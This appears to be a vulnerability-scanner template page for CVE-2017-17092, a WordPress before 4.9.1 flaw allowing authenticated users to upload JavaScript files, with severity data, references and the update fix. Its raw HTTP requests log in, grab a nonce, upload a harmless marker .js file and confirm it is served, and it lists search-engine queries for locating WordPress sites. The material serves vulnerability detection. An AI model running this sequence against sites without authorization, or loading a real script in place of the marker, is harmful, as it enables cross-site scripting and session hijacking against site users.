WordPress < 4.9.1 - Authenticated JavaScript File Upload

CVE-2017-17092

Verified

Description

WordPress before 4.9.1 contains a cross-site scripting caused by not requiring unfiltered_html capability for uploading .js files in functions.php, letting remote attackers execute scripts via crafted files, exploit requires upload permissions.

Severity

Medium

CVSS Score

5.4

Exploit Probability

Affected Product

wordpress

Published Date

November 20, 2025

Template Author

0x_akoko

CVE-2017-17092.yaml

id: CVE-2017-17092

info:
  name: WordPress < 4.9.1 - Authenticated JavaScript File Upload
  author: 0x_Akoko
  severity: medium
  description: |
    WordPress before 4.9.1 contains a cross-site scripting caused by not requiring unfiltered_html capability for uploading .js files in functions.php, letting remote attackers execute scripts via crafted files, exploit requires upload permissions.
  impact: |
    Remote attackers can execute arbitrary JavaScript in the context of the site, leading to potential session hijacking or defacement.
  remediation: |
    Update to WordPress 4.9.1 or later.
  reference:
    - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    - https://wpscan.com/vulnerability/0d2323bd-aecd-4d58-ba4b-597a43034f57
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17092
    - https://lists.debian.org/debian-lts-announce/2017/12/msg00019.html
    - https://wpvulndb.com/vulnerabilities/8966
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2017-17092
    cwe-id: CWE-79
    epss-score: 0.02905
    epss-percentile: 0.85911
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: wordpress
    product: wordpress
    shodan-query: http.component:"wordpress"
    fofa-query: body="oembed" && body="wp-"
  tags: cve,cve2017,wordpress,wpscan,xss,upload,authenticated,intrusive,file-upload

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"
  marker: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/upload.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, '_wpnonce')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"_wpnonce":"([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/async-upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="name"

        {{filename}}.js
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="action"

        upload-attachment
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="_wpnonce"

        {{nonce}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.js"
        Content-Type: application/javascript

        //{{marker}}
        ------WebKitFormBoundary{{randstr}}--

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "success",".js")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: upload_year
        group: 1
        internal: true
        regex:
          - 'uploads\\/([0-9]+)\\/[0-9]+\\/[^"]+\.js'

      - type: regex
        name: upload_month
        group: 1
        internal: true
        regex:
          - 'uploads\\/[0-9]+\\/([0-9]+)\\/[^"]+\.js'

  - raw:
      - |
        GET /wp-content/uploads/{{upload_year}}/{{upload_month}}/{{filename}}.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "//{{marker}}")
        condition: and
# digest: 4b0a00483046022100f8e97370ea28736fe389f28079aeb51186b2660269fe94009a7a9fc4dc67ca82022100e7451cc57af516f4034a34efcbd62518877762acaa41c668bfb8454c5406aa04:922c64590222798bb761d5b6d8e72950

5.4Score

CVSS Metrics

CVSS Vector:

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2017-17092

CWE ID:

cwe-79

References

https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/https://wpscan.com/vulnerability/0d2323bd-aecd-4d58-ba4b-597a43034f57 https://nvd.nist.gov/vuln/detail/CVE-2017-17092 https://lists.debian.org/debian-lts-announce/2017/12/msg00019.html https://wpvulndb.com/vulnerabilities/8966

Remediation Steps

Update to WordPress 4.9.1 or later.